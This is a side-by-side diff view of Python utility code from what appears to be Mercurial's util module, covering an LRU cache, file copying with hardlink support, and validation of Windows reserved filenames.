1456 n = n.next
1457 n = n.next
1457
1458
1458 def __getitem__(self, k):
1459 def __getitem__(self, k):
1459 node = self._cache[k]
1460 node = self._cache[k]
1460 self._movetohead(node)
1461 self._movetohead(node)
1461 return node.value
1462 return node.value
1462
1463
1463 def insert(self, k, v, cost=0):
1464 def insert(self, k, v, cost=0):
1464 """Insert a new item in the cache with optional cost value."""
1465 """Insert a new item in the cache with optional cost value."""
1465 node = self._cache.get(k)
1466 node = self._cache.get(k)
1466 # Replace existing value and mark as newest.
1467 # Replace existing value and mark as newest.
1467 if node is not None:
1468 if node is not None:
1468 self.totalcost -= node.cost
1469 self.totalcost -= node.cost
1469 node.value = v
1470 node.value = v
1470 node.cost = cost
1471 node.cost = cost
1471 self.totalcost += cost
1472 self.totalcost += cost
1472 self._movetohead(node)
1473 self._movetohead(node)
1473
1474
1474 if self.maxcost:
1475 if self.maxcost:
1475 self._enforcecostlimit()
1476 self._enforcecostlimit()
1476
1477
1477 return
1478 return
1478
1479
1479 if self._size < self.capacity:
1480 if self._size < self.capacity:
1480 node = self._addcapacity()
1481 node = self._addcapacity()
1481 else:
1482 else:
1482 # Grab the last/oldest item.
1483 # Grab the last/oldest item.
1483 node = self._head.prev
1484 node = self._head.prev
1484
1485
1485 # At capacity. Kill the old entry.
1486 # At capacity. Kill the old entry.
1486 if node.key is not _notset:
1487 if node.key is not _notset:
1487 self.totalcost -= node.cost
1488 self.totalcost -= node.cost
1488 del self._cache[node.key]
1489 del self._cache[node.key]
1489
1490
1490 node.key = k
1491 node.key = k
1491 node.value = v
1492 node.value = v
1492 node.cost = cost
1493 node.cost = cost
1493 self.totalcost += cost
1494 self.totalcost += cost
1494 self._cache[k] = node
1495 self._cache[k] = node
1495 # And mark it as newest entry. No need to adjust order since it
1496 # And mark it as newest entry. No need to adjust order since it
1496 # is already self._head.prev.
1497 # is already self._head.prev.
1497 self._head = node
1498 self._head = node
1498
1499
1499 if self.maxcost:
1500 if self.maxcost:
1500 self._enforcecostlimit()
1501 self._enforcecostlimit()
1501
1502
1502 def __setitem__(self, k, v):
1503 def __setitem__(self, k, v):
1503 self.insert(k, v)
1504 self.insert(k, v)
1504
1505
1505 def __delitem__(self, k):
1506 def __delitem__(self, k):
1506 self.pop(k)
1507 self.pop(k)
1507
1508
1508 def pop(self, k, default=_notset):
1509 def pop(self, k, default=_notset):
1509 try:
1510 try:
1510 node = self._cache.pop(k)
1511 node = self._cache.pop(k)
1511 except KeyError:
1512 except KeyError:
1512 if default is _notset:
1513 if default is _notset:
1513 raise
1514 raise
1514 return default
1515 return default
1515
1516
1516 assert node is not None # help pytype
1517 assert node is not None # help pytype
1517 value = node.value
1518 value = node.value
1518 self.totalcost -= node.cost
1519 self.totalcost -= node.cost
1519 node.markempty()
1520 node.markempty()
1520
1521
1521 # Temporarily mark as newest item before re-adjusting head to make
1522 # Temporarily mark as newest item before re-adjusting head to make
1522 # this node the oldest item.
1523 # this node the oldest item.
1523 self._movetohead(node)
1524 self._movetohead(node)
1524 self._head = node.next
1525 self._head = node.next
1525
1526
1526 return value
1527 return value
1527
1528
1528 # Additional dict methods.
1529 # Additional dict methods.
1529
1530
1530 def get(self, k, default=None):
1531 def get(self, k, default=None):
1531 try:
1532 try:
1532 return self.__getitem__(k)
1533 return self.__getitem__(k)
1533 except KeyError:
1534 except KeyError:
1534 return default
1535 return default
1535
1536
1536 def peek(self, k, default=_notset):
1537 def peek(self, k, default=_notset):
1537 """Get the specified item without moving it to the head
1538 """Get the specified item without moving it to the head
1538
1539
1539 Unlike get(), this doesn't mutate the internal state. But be aware
1540 Unlike get(), this doesn't mutate the internal state. But be aware
1540 that it doesn't mean peek() is thread safe.
1541 that it doesn't mean peek() is thread safe.
1541 """
1542 """
1542 try:
1543 try:
1543 node = self._cache[k]
1544 node = self._cache[k]
1544 return node.value
1545 return node.value
1545 except KeyError:
1546 except KeyError:
1546 if default is _notset:
1547 if default is _notset:
1547 raise
1548 raise
1548 return default
1549 return default
1549
1550
1550 def clear(self):
1551 def clear(self):
1551 n = self._head
1552 n = self._head
1552 while n.key is not _notset:
1553 while n.key is not _notset:
1553 self.totalcost -= n.cost
1554 self.totalcost -= n.cost
1554 n.markempty()
1555 n.markempty()
1555 n = n.next
1556 n = n.next
1556
1557
1557 self._cache.clear()
1558 self._cache.clear()
1558
1559
1559 def copy(self, capacity=None, maxcost=0):
1560 def copy(self, capacity=None, maxcost=0):
1560 """Create a new cache as a copy of the current one.
1561 """Create a new cache as a copy of the current one.
1561
1562
1562 By default, the new cache has the same capacity as the existing one.
1563 By default, the new cache has the same capacity as the existing one.
1563 But, the cache capacity can be changed as part of performing the
1564 But, the cache capacity can be changed as part of performing the
1564 copy.
1565 copy.
1565
1566
1566 Items in the copy have an insertion/access order matching this
1567 Items in the copy have an insertion/access order matching this
1567 instance.
1568 instance.
1568 """
1569 """
1569
1570
1570 capacity = capacity or self.capacity
1571 capacity = capacity or self.capacity
1571 maxcost = maxcost or self.maxcost
1572 maxcost = maxcost or self.maxcost
1572 result = lrucachedict(capacity, maxcost=maxcost)
1573 result = lrucachedict(capacity, maxcost=maxcost)
1573
1574
1574 # We copy entries by iterating in oldest-to-newest order so the copy
1575 # We copy entries by iterating in oldest-to-newest order so the copy
1575 # has the correct ordering.
1576 # has the correct ordering.
1576
1577
1577 # Find the first non-empty entry.
1578 # Find the first non-empty entry.
1578 n = self._head.prev
1579 n = self._head.prev
1579 while n.key is _notset and n is not self._head:
1580 while n.key is _notset and n is not self._head:
1580 n = n.prev
1581 n = n.prev
1581
1582
1582 # We could potentially skip the first N items when decreasing capacity.
1583 # We could potentially skip the first N items when decreasing capacity.
1583 # But let's keep it simple unless it is a performance problem.
1584 # But let's keep it simple unless it is a performance problem.
1584 for i in range(len(self._cache)):
1585 for i in range(len(self._cache)):
1585 result.insert(n.key, n.value, cost=n.cost)
1586 result.insert(n.key, n.value, cost=n.cost)
1586 n = n.prev
1587 n = n.prev
1587
1588
1588 return result
1589 return result
1589
1590
1590 def popoldest(self):
1591 def popoldest(self):
1591 """Remove the oldest item from the cache.
1592 """Remove the oldest item from the cache.
1592
1593
1593 Returns the (key, value) describing the removed cache entry.
1594 Returns the (key, value) describing the removed cache entry.
1594 """
1595 """
1595 if not self._cache:
1596 if not self._cache:
1596 return
1597 return
1597
1598
1598 # Walk the linked list backwards starting at tail node until we hit
1599 # Walk the linked list backwards starting at tail node until we hit
1599 # a non-empty node.
1600 # a non-empty node.
1600 n = self._head.prev
1601 n = self._head.prev
1601 while n.key is _notset:
1602 while n.key is _notset:
1602 n = n.prev
1603 n = n.prev
1603
1604
1604 assert n is not None # help pytype
1605 assert n is not None # help pytype
1605
1606
1606 key, value = n.key, n.value
1607 key, value = n.key, n.value
1607
1608
1608 # And remove it from the cache and mark it as empty.
1609 # And remove it from the cache and mark it as empty.
1609 del self._cache[n.key]
1610 del self._cache[n.key]
1610 self.totalcost -= n.cost
1611 self.totalcost -= n.cost
1611 n.markempty()
1612 n.markempty()
1612
1613
1613 return key, value
1614 return key, value
1614
1615
1615 def _movetohead(self, node):
1616 def _movetohead(self, node):
1616 """Mark a node as the newest, making it the new head.
1617 """Mark a node as the newest, making it the new head.
1617
1618
1618 When a node is accessed, it becomes the freshest entry in the LRU
1619 When a node is accessed, it becomes the freshest entry in the LRU
1619 list, which is denoted by self._head.
1620 list, which is denoted by self._head.
1620
1621
1621 Visually, let's make ``N`` the new head node (* denotes head):
1622 Visually, let's make ``N`` the new head node (* denotes head):
1622
1623
1623 previous/oldest <-> head <-> next/next newest
1624 previous/oldest <-> head <-> next/next newest
1624
1625
1625 ----<->--- A* ---<->-----
1626 ----<->--- A* ---<->-----
1626 | |
1627 | |
1627 E <-> D <-> N <-> C <-> B
1628 E <-> D <-> N <-> C <-> B
1628
1629
1629 To:
1630 To:
1630
1631
1631 ----<->--- N* ---<->-----
1632 ----<->--- N* ---<->-----
1632 | |
1633 | |
1633 E <-> D <-> C <-> B <-> A
1634 E <-> D <-> C <-> B <-> A
1634
1635
1635 This requires the following moves:
1636 This requires the following moves:
1636
1637
1637 C.next = D (node.prev.next = node.next)
1638 C.next = D (node.prev.next = node.next)
1638 D.prev = C (node.next.prev = node.prev)
1639 D.prev = C (node.next.prev = node.prev)
1639 E.next = N (head.prev.next = node)
1640 E.next = N (head.prev.next = node)
1640 N.prev = E (node.prev = head.prev)
1641 N.prev = E (node.prev = head.prev)
1641 N.next = A (node.next = head)
1642 N.next = A (node.next = head)
1642 A.prev = N (head.prev = node)
1643 A.prev = N (head.prev = node)
1643 """
1644 """
1644 head = self._head
1645 head = self._head
1645 # C.next = D
1646 # C.next = D
1646 node.prev.next = node.next
1647 node.prev.next = node.next
1647 # D.prev = C
1648 # D.prev = C
1648 node.next.prev = node.prev
1649 node.next.prev = node.prev
1649 # N.prev = E
1650 # N.prev = E
1650 node.prev = head.prev
1651 node.prev = head.prev
1651 # N.next = A
1652 # N.next = A
1652 # It is tempting to do just "head" here, however if node is
1653 # It is tempting to do just "head" here, however if node is
1653 # adjacent to head, this will do bad things.
1654 # adjacent to head, this will do bad things.
1654 node.next = head.prev.next
1655 node.next = head.prev.next
1655 # E.next = N
1656 # E.next = N
1656 node.next.prev = node
1657 node.next.prev = node
1657 # A.prev = N
1658 # A.prev = N
1658 node.prev.next = node
1659 node.prev.next = node
1659
1660
1660 self._head = node
1661 self._head = node
1661
1662
1662 def _addcapacity(self):
1663 def _addcapacity(self):
1663 """Add a node to the circular linked list.
1664 """Add a node to the circular linked list.
1664
1665
1665 The new node is inserted before the head node.
1666 The new node is inserted before the head node.
1666 """
1667 """
1667 head = self._head
1668 head = self._head
1668 node = _lrucachenode()
1669 node = _lrucachenode()
1669 head.prev.next = node
1670 head.prev.next = node
1670 node.prev = head.prev
1671 node.prev = head.prev
1671 node.next = head
1672 node.next = head
1672 head.prev = node
1673 head.prev = node
1673 self._size += 1
1674 self._size += 1
1674 return node
1675 return node
1675
1676
1676 def _enforcecostlimit(self):
1677 def _enforcecostlimit(self):
1677 # This should run after an insertion. It should only be called if total
1678 # This should run after an insertion. It should only be called if total
1678 # cost limits are being enforced.
1679 # cost limits are being enforced.
1679 # The most recently inserted node is never evicted.
1680 # The most recently inserted node is never evicted.
1680 if len(self) <= 1 or self.totalcost <= self.maxcost:
1681 if len(self) <= 1 or self.totalcost <= self.maxcost:
1681 return
1682 return
1682
1683
1683 # This is logically equivalent to calling popoldest() until we
1684 # This is logically equivalent to calling popoldest() until we
1684 # free up enough cost. We don't do that since popoldest() needs
1685 # free up enough cost. We don't do that since popoldest() needs
1685 # to walk the linked list and doing this in a loop would be
1686 # to walk the linked list and doing this in a loop would be
1686 # quadratic. So we find the first non-empty node and then
1687 # quadratic. So we find the first non-empty node and then
1687 # walk nodes until we free up enough capacity.
1688 # walk nodes until we free up enough capacity.
1688 #
1689 #
1689 # If we only removed the minimum number of nodes to free enough
1690 # If we only removed the minimum number of nodes to free enough
1690 # cost at insert time, chances are high that the next insert would
1691 # cost at insert time, chances are high that the next insert would
1691 # also require pruning. This would effectively constitute quadratic
1692 # also require pruning. This would effectively constitute quadratic
1692 # behavior for insert-heavy workloads. To mitigate this, we set a
1693 # behavior for insert-heavy workloads. To mitigate this, we set a
1693 # target cost that is a percentage of the max cost. This will tend
1694 # target cost that is a percentage of the max cost. This will tend
1694 # to free more nodes when the high water mark is reached, which
1695 # to free more nodes when the high water mark is reached, which
1695 # lowers the chances of needing to prune on the subsequent insert.
1696 # lowers the chances of needing to prune on the subsequent insert.
1696 targetcost = int(self.maxcost * 0.75)
1697 targetcost = int(self.maxcost * 0.75)
1697
1698
1698 n = self._head.prev
1699 n = self._head.prev
1699 while n.key is _notset:
1700 while n.key is _notset:
1700 n = n.prev
1701 n = n.prev
1701
1702
1702 while len(self) > 1 and self.totalcost > targetcost:
1703 while len(self) > 1 and self.totalcost > targetcost:
1703 del self._cache[n.key]
1704 del self._cache[n.key]
1704 self.totalcost -= n.cost
1705 self.totalcost -= n.cost
1705 n.markempty()
1706 n.markempty()
1706 n = n.prev
1707 n = n.prev
1707
1708
1708
1709
1709 def lrucachefunc(func):
1710 def lrucachefunc(func):
1710 '''cache most recent results of function calls'''
1711 '''cache most recent results of function calls'''
1711 cache = {}
1712 cache = {}
1712 order = collections.deque()
1713 order = collections.deque()
1713 if func.__code__.co_argcount == 1:
1714 if func.__code__.co_argcount == 1:
1714
1715
1715 def f(arg):
1716 def f(arg):
1716 if arg not in cache:
1717 if arg not in cache:
1717 if len(cache) > 20:
1718 if len(cache) > 20:
1718 del cache[order.popleft()]
1719 del cache[order.popleft()]
1719 cache[arg] = func(arg)
1720 cache[arg] = func(arg)
1720 else:
1721 else:
1721 order.remove(arg)
1722 order.remove(arg)
1722 order.append(arg)
1723 order.append(arg)
1723 return cache[arg]
1724 return cache[arg]
1724
1725
1725 else:
1726 else:
1726
1727
1727 def f(*args):
1728 def f(*args):
1728 if args not in cache:
1729 if args not in cache:
1729 if len(cache) > 20:
1730 if len(cache) > 20:
1730 del cache[order.popleft()]
1731 del cache[order.popleft()]
1731 cache[args] = func(*args)
1732 cache[args] = func(*args)
1732 else:
1733 else:
1733 order.remove(args)
1734 order.remove(args)
1734 order.append(args)
1735 order.append(args)
1735 return cache[args]
1736 return cache[args]
1736
1737
1737 return f
1738 return f
1738
1739
1739
1740
1740 class propertycache(object):
1741 class propertycache(object):
1741 def __init__(self, func):
1742 def __init__(self, func):
1742 self.func = func
1743 self.func = func
1743 self.name = func.__name__
1744 self.name = func.__name__
1744
1745
1745 def __get__(self, obj, type=None):
1746 def __get__(self, obj, type=None):
1746 result = self.func(obj)
1747 result = self.func(obj)
1747 self.cachevalue(obj, result)
1748 self.cachevalue(obj, result)
1748 return result
1749 return result
1749
1750
1750 def cachevalue(self, obj, value):
1751 def cachevalue(self, obj, value):
1751 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1752 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1752 obj.__dict__[self.name] = value
1753 obj.__dict__[self.name] = value
1753
1754
1754
1755
1755 def clearcachedproperty(obj, prop):
1756 def clearcachedproperty(obj, prop):
1756 '''clear a cached property value, if one has been set'''
1757 '''clear a cached property value, if one has been set'''
1757 prop = pycompat.sysstr(prop)
1758 prop = pycompat.sysstr(prop)
1758 if prop in obj.__dict__:
1759 if prop in obj.__dict__:
1759 del obj.__dict__[prop]
1760 del obj.__dict__[prop]
1760
1761
1761
1762
1762 def increasingchunks(source, min=1024, max=65536):
1763 def increasingchunks(source, min=1024, max=65536):
1763 '''return no less than min bytes per chunk while data remains,
1764 '''return no less than min bytes per chunk while data remains,
1764 doubling min after each chunk until it reaches max'''
1765 doubling min after each chunk until it reaches max'''
1765
1766
1766 def log2(x):
1767 def log2(x):
1767 if not x:
1768 if not x:
1768 return 0
1769 return 0
1769 i = 0
1770 i = 0
1770 while x:
1771 while x:
1771 x >>= 1
1772 x >>= 1
1772 i += 1
1773 i += 1
1773 return i - 1
1774 return i - 1
1774
1775
1775 buf = []
1776 buf = []
1776 blen = 0
1777 blen = 0
1777 for chunk in source:
1778 for chunk in source:
1778 buf.append(chunk)
1779 buf.append(chunk)
1779 blen += len(chunk)
1780 blen += len(chunk)
1780 if blen >= min:
1781 if blen >= min:
1781 if min < max:
1782 if min < max:
1782 min = min << 1
1783 min = min << 1
1783 nmin = 1 << log2(blen)
1784 nmin = 1 << log2(blen)
1784 if nmin > min:
1785 if nmin > min:
1785 min = nmin
1786 min = nmin
1786 if min > max:
1787 if min > max:
1787 min = max
1788 min = max
1788 yield b''.join(buf)
1789 yield b''.join(buf)
1789 blen = 0
1790 blen = 0
1790 buf = []
1791 buf = []
1791 if buf:
1792 if buf:
1792 yield b''.join(buf)
1793 yield b''.join(buf)
1793
1794
1794
1795
1795 def always(fn):
1796 def always(fn):
1796 return True
1797 return True
1797
1798
1798
1799
1799 def never(fn):
1800 def never(fn):
1800 return False
1801 return False
1801
1802
1802
1803
1803 def nogc(func):
1804 def nogc(func):
1804 """disable garbage collector
1805 """disable garbage collector
1805
1806
1806 Python's garbage collector triggers a GC each time a certain number of
1807 Python's garbage collector triggers a GC each time a certain number of
1807 container objects (the number being defined by gc.get_threshold()) are
1808 container objects (the number being defined by gc.get_threshold()) are
1808 allocated even when marked not to be tracked by the collector. Tracking has
1809 allocated even when marked not to be tracked by the collector. Tracking has
1809 no effect on when GCs are triggered, only on what objects the GC looks
1810 no effect on when GCs are triggered, only on what objects the GC looks
1810 into. As a workaround, disable GC while building complex (huge)
1811 into. As a workaround, disable GC while building complex (huge)
1811 containers.
1812 containers.
1812
1813
1813 This garbage collector issue have been fixed in 2.7. But it still affect
1814 This garbage collector issue have been fixed in 2.7. But it still affect
1814 CPython's performance.
1815 CPython's performance.
1815 """
1816 """
1816
1817
1817 def wrapper(*args, **kwargs):
1818 def wrapper(*args, **kwargs):
1818 gcenabled = gc.isenabled()
1819 gcenabled = gc.isenabled()
1819 gc.disable()
1820 gc.disable()
1820 try:
1821 try:
1821 return func(*args, **kwargs)
1822 return func(*args, **kwargs)
1822 finally:
1823 finally:
1823 if gcenabled:
1824 if gcenabled:
1824 gc.enable()
1825 gc.enable()
1825
1826
1826 return wrapper
1827 return wrapper
1827
1828
1828
1829
1829 if pycompat.ispypy:
1830 if pycompat.ispypy:
1830 # PyPy runs slower with gc disabled
1831 # PyPy runs slower with gc disabled
1831 nogc = lambda x: x
1832 nogc = lambda x: x
1832
1833
1833
1834
1834 def pathto(root, n1, n2):
1835 def pathto(root, n1, n2):
1835 '''return the relative path from one place to another.
1836 '''return the relative path from one place to another.
1836 root should use os.sep to separate directories
1837 root should use os.sep to separate directories
1837 n1 should use os.sep to separate directories
1838 n1 should use os.sep to separate directories
1838 n2 should use "/" to separate directories
1839 n2 should use "/" to separate directories
1839 returns an os.sep-separated path.
1840 returns an os.sep-separated path.
1840
1841
1841 If n1 is a relative path, it's assumed it's
1842 If n1 is a relative path, it's assumed it's
1842 relative to root.
1843 relative to root.
1843 n2 should always be relative to root.
1844 n2 should always be relative to root.
1844 '''
1845 '''
1845 if not n1:
1846 if not n1:
1846 return localpath(n2)
1847 return localpath(n2)
1847 if os.path.isabs(n1):
1848 if os.path.isabs(n1):
1848 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1849 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1849 return os.path.join(root, localpath(n2))
1850 return os.path.join(root, localpath(n2))
1850 n2 = b'/'.join((pconvert(root), n2))
1851 n2 = b'/'.join((pconvert(root), n2))
1851 a, b = splitpath(n1), n2.split(b'/')
1852 a, b = splitpath(n1), n2.split(b'/')
1852 a.reverse()
1853 a.reverse()
1853 b.reverse()
1854 b.reverse()
1854 while a and b and a[-1] == b[-1]:
1855 while a and b and a[-1] == b[-1]:
1855 a.pop()
1856 a.pop()
1856 b.pop()
1857 b.pop()
1857 b.reverse()
1858 b.reverse()
1858 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1859 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1859
1860
1860
1861
1861 def checksignature(func, depth=1):
1862 def checksignature(func, depth=1):
1862 '''wrap a function with code to check for calling errors'''
1863 '''wrap a function with code to check for calling errors'''
1863
1864
1864 def check(*args, **kwargs):
1865 def check(*args, **kwargs):
1865 try:
1866 try:
1866 return func(*args, **kwargs)
1867 return func(*args, **kwargs)
1867 except TypeError:
1868 except TypeError:
1868 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1869 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1869 raise error.SignatureError
1870 raise error.SignatureError
1870 raise
1871 raise
1871
1872
1872 return check
1873 return check
1873
1874
1874
1875
1875 # a whilelist of known filesystems where hardlink works reliably
1876 # a whilelist of known filesystems where hardlink works reliably
1876 _hardlinkfswhitelist = {
1877 _hardlinkfswhitelist = {
1877 b'apfs',
1878 b'apfs',
1878 b'btrfs',
1879 b'btrfs',
1879 b'ext2',
1880 b'ext2',
1880 b'ext3',
1881 b'ext3',
1881 b'ext4',
1882 b'ext4',
1882 b'hfs',
1883 b'hfs',
1883 b'jfs',
1884 b'jfs',
1884 b'NTFS',
1885 b'NTFS',
1885 b'reiserfs',
1886 b'reiserfs',
1886 b'tmpfs',
1887 b'tmpfs',
1887 b'ufs',
1888 b'ufs',
1888 b'xfs',
1889 b'xfs',
1889 b'zfs',
1890 b'zfs',
1890 }
1891 }
1891
1892
1892
1893
1893 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1894 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1894 '''copy a file, preserving mode and optionally other stat info like
1895 '''copy a file, preserving mode and optionally other stat info like
1895 atime/mtime
1896 atime/mtime
1896
1897
1897 checkambig argument is used with filestat, and is useful only if
1898 checkambig argument is used with filestat, and is useful only if
1898 destination file is guarded by any lock (e.g. repo.lock or
1899 destination file is guarded by any lock (e.g. repo.lock or
1899 repo.wlock).
1900 repo.wlock).
1900
1901
1901 copystat and checkambig should be exclusive.
1902 copystat and checkambig should be exclusive.
1902 '''
1903 '''
1903 assert not (copystat and checkambig)
1904 assert not (copystat and checkambig)
1904 oldstat = None
1905 oldstat = None
1905 if os.path.lexists(dest):
1906 if os.path.lexists(dest):
1906 if checkambig:
1907 if checkambig:
1907 oldstat = checkambig and filestat.frompath(dest)
1908 oldstat = checkambig and filestat.frompath(dest)
1908 unlink(dest)
1909 unlink(dest)
1909 if hardlink:
1910 if hardlink:
1910 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1911 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1911 # unless we are confident that dest is on a whitelisted filesystem.
1912 # unless we are confident that dest is on a whitelisted filesystem.
1912 try:
1913 try:
1913 fstype = getfstype(os.path.dirname(dest))
1914 fstype = getfstype(os.path.dirname(dest))
1914 except OSError:
1915 except OSError:
1915 fstype = None
1916 fstype = None
1916 if fstype not in _hardlinkfswhitelist:
1917 if fstype not in _hardlinkfswhitelist:
1917 hardlink = False
1918 hardlink = False
1918 if hardlink:
1919 if hardlink:
1919 try:
1920 try:
1920 oslink(src, dest)
1921 oslink(src, dest)
1921 return
1922 return
1922 except (IOError, OSError):
1923 except (IOError, OSError):
1923 pass # fall back to normal copy
1924 pass # fall back to normal copy
1924 if os.path.islink(src):
1925 if os.path.islink(src):
1925 os.symlink(os.readlink(src), dest)
1926 os.symlink(os.readlink(src), dest)
1926 # copytime is ignored for symlinks, but in general copytime isn't needed
1927 # copytime is ignored for symlinks, but in general copytime isn't needed
1927 # for them anyway
1928 # for them anyway
1928 else:
1929 else:
1929 try:
1930 try:
1930 shutil.copyfile(src, dest)
1931 shutil.copyfile(src, dest)
1931 if copystat:
1932 if copystat:
1932 # copystat also copies mode
1933 # copystat also copies mode
1933 shutil.copystat(src, dest)
1934 shutil.copystat(src, dest)
1934 else:
1935 else:
1935 shutil.copymode(src, dest)
1936 shutil.copymode(src, dest)
1936 if oldstat and oldstat.stat:
1937 if oldstat and oldstat.stat:
1937 newstat = filestat.frompath(dest)
1938 newstat = filestat.frompath(dest)
1938 if newstat.isambig(oldstat):
1939 if newstat.isambig(oldstat):
1939 # stat of copied file is ambiguous to original one
1940 # stat of copied file is ambiguous to original one
1940 advanced = (
1941 advanced = (
1941 oldstat.stat[stat.ST_MTIME] + 1
1942 oldstat.stat[stat.ST_MTIME] + 1
1942 ) & 0x7FFFFFFF
1943 ) & 0x7FFFFFFF
1943 os.utime(dest, (advanced, advanced))
1944 os.utime(dest, (advanced, advanced))
1944 except shutil.Error as inst:
1945 except shutil.Error as inst:
1945 raise error.Abort(stringutil.forcebytestr(inst))
1946 raise error.Abort(stringutil.forcebytestr(inst))
1946
1947
1947
1948
1948 def copyfiles(src, dst, hardlink=None, progress=None):
1949 def copyfiles(src, dst, hardlink=None, progress=None):
1949 """Copy a directory tree using hardlinks if possible."""
1950 """Copy a directory tree using hardlinks if possible."""
1950 num = 0
1951 num = 0
1951
1952
1952 def settopic():
1953 def settopic():
1953 if progress:
1954 if progress:
1954 progress.topic = _(b'linking') if hardlink else _(b'copying')
1955 progress.topic = _(b'linking') if hardlink else _(b'copying')
1955
1956
1956 if os.path.isdir(src):
1957 if os.path.isdir(src):
1957 if hardlink is None:
1958 if hardlink is None:
1958 hardlink = (
1959 hardlink = (
1959 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1960 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1960 )
1961 )
1961 settopic()
1962 settopic()
1962 os.mkdir(dst)
1963 os.mkdir(dst)
1963 for name, kind in listdir(src):
1964 for name, kind in listdir(src):
1964 srcname = os.path.join(src, name)
1965 srcname = os.path.join(src, name)
1965 dstname = os.path.join(dst, name)
1966 dstname = os.path.join(dst, name)
1966 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1967 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1967 num += n
1968 num += n
1968 else:
1969 else:
1969 if hardlink is None:
1970 if hardlink is None:
1970 hardlink = (
1971 hardlink = (
1971 os.stat(os.path.dirname(src)).st_dev
1972 os.stat(os.path.dirname(src)).st_dev
1972 == os.stat(os.path.dirname(dst)).st_dev
1973 == os.stat(os.path.dirname(dst)).st_dev
1973 )
1974 )
1974 settopic()
1975 settopic()
1975
1976
1976 if hardlink:
1977 if hardlink:
1977 try:
1978 try:
1978 oslink(src, dst)
1979 oslink(src, dst)
1979 except (IOError, OSError):
1980 except (IOError, OSError):
1980 hardlink = False
1981 hardlink = False
1981 shutil.copy(src, dst)
1982 shutil.copy(src, dst)
1982 else:
1983 else:
1983 shutil.copy(src, dst)
1984 shutil.copy(src, dst)
1984 num += 1
1985 num += 1
1985 if progress:
1986 if progress:
1986 progress.increment()
1987 progress.increment()
1987
1988
1988 return hardlink, num
1989 return hardlink, num
1989
1990
1990
1991
1991 _winreservednames = {
1992 _winreservednames = {
1992 b'con',
1993 b'con',
1993 b'prn',
1994 b'prn',
1994 b'aux',
1995 b'aux',
1995 b'nul',
1996 b'nul',
1996 b'com1',
1997 b'com1',
1997 b'com2',
1998 b'com2',
1998 b'com3',
1999 b'com3',
1999 b'com4',
2000 b'com4',
2000 b'com5',
2001 b'com5',
2001 b'com6',
2002 b'com6',
2002 b'com7',
2003 b'com7',
2003 b'com8',
2004 b'com8',
2004 b'com9',
2005 b'com9',
2005 b'lpt1',
2006 b'lpt1',
2006 b'lpt2',
2007 b'lpt2',
2007 b'lpt3',
2008 b'lpt3',
2008 b'lpt4',
2009 b'lpt4',
2009 b'lpt5',
2010 b'lpt5',
2010 b'lpt6',
2011 b'lpt6',
2011 b'lpt7',
2012 b'lpt7',
2012 b'lpt8',
2013 b'lpt8',
2013 b'lpt9',
2014 b'lpt9',
2014 }
2015 }
2015 _winreservedchars = b':*?"<>|'
2016 _winreservedchars = b':*?"<>|'
2016
2017
2017
2018
2018 def checkwinfilename(path):
2019 def checkwinfilename(path):
2019 r'''Check that the base-relative path is a valid filename on Windows.
2020 r'''Check that the base-relative path is a valid filename on Windows.
2020 Returns None if the path is ok, or a UI string describing the problem.
2021 Returns None if the path is ok, or a UI string describing the problem.
2021
2022
2022 >>> checkwinfilename(b"just/a/normal/path")
2023 >>> checkwinfilename(b"just/a/normal/path")
2023 >>> checkwinfilename(b"foo/bar/con.xml")
2024 >>> checkwinfilename(b"foo/bar/con.xml")
2024 "filename contains 'con', which is reserved on Windows"
2025 "filename contains 'con', which is reserved on Windows"
2025 >>> checkwinfilename(b"foo/con.xml/bar")
2026 >>> checkwinfilename(b"foo/con.xml/bar")
2026 "filename contains 'con', which is reserved on Windows"
2027 "filename contains 'con', which is reserved on Windows"
2027 >>> checkwinfilename(b"foo/bar/xml.con")
2028 >>> checkwinfilename(b"foo/bar/xml.con")
2028 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2029 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2029 "filename contains 'AUX', which is reserved on Windows"
2030 "filename contains 'AUX', which is reserved on Windows"
2030 >>> checkwinfilename(b"foo/bar/bla:.txt")
2031 >>> checkwinfilename(b"foo/bar/bla:.txt")
2031 "filename contains ':', which is reserved on Windows"
2032 "filename contains ':', which is reserved on Windows"
2032 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2033 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2033 "filename contains '\\x07', which is invalid on Windows"
2034 "filename contains '\\x07', which is invalid on Windows"
2034 >>> checkwinfilename(b"foo/bar/bla ")
2035 >>> checkwinfilename(b"foo/bar/bla ")
2035 "filename ends with ' ', which is not allowed on Windows"
2036 "filename ends with ' ', which is not allowed on Windows"
2036 >>> checkwinfilename(b"../bar")
2037 >>> checkwinfilename(b"../bar")
2037 >>> checkwinfilename(b"foo\\")
2038 >>> checkwinfilename(b"foo\\")
2038 "filename ends with '\\', which is invalid on Windows"
2039 "filename ends with '\\', which is invalid on Windows"
2039 >>> checkwinfilename(b"foo\\/bar")
2040 >>> checkwinfilename(b"foo\\/bar")
2040 "directory name ends with '\\', which is invalid on Windows"
2041 "directory name ends with '\\', which is invalid on Windows"
2041 '''
2042 '''
2042 if path.endswith(b'\\'):
2043 if path.endswith(b'\\'):
2043 return _(b"filename ends with '\\', which is invalid on Windows")
2044 return _(b"filename ends with '\\', which is invalid on Windows")
2044 if b'\\/' in path:
2045 if b'\\/' in path:
2045 return _(b"directory name ends with '\\', which is invalid on Windows")
2046 return _(b"directory name ends with '\\', which is invalid on Windows")
2046 for n in path.replace(b'\\', b'/').split(b'/'):
2047 for n in path.replace(b'\\', b'/').split(b'/'):
2047 if not n:
2048 if not n:
2048 continue
2049 continue
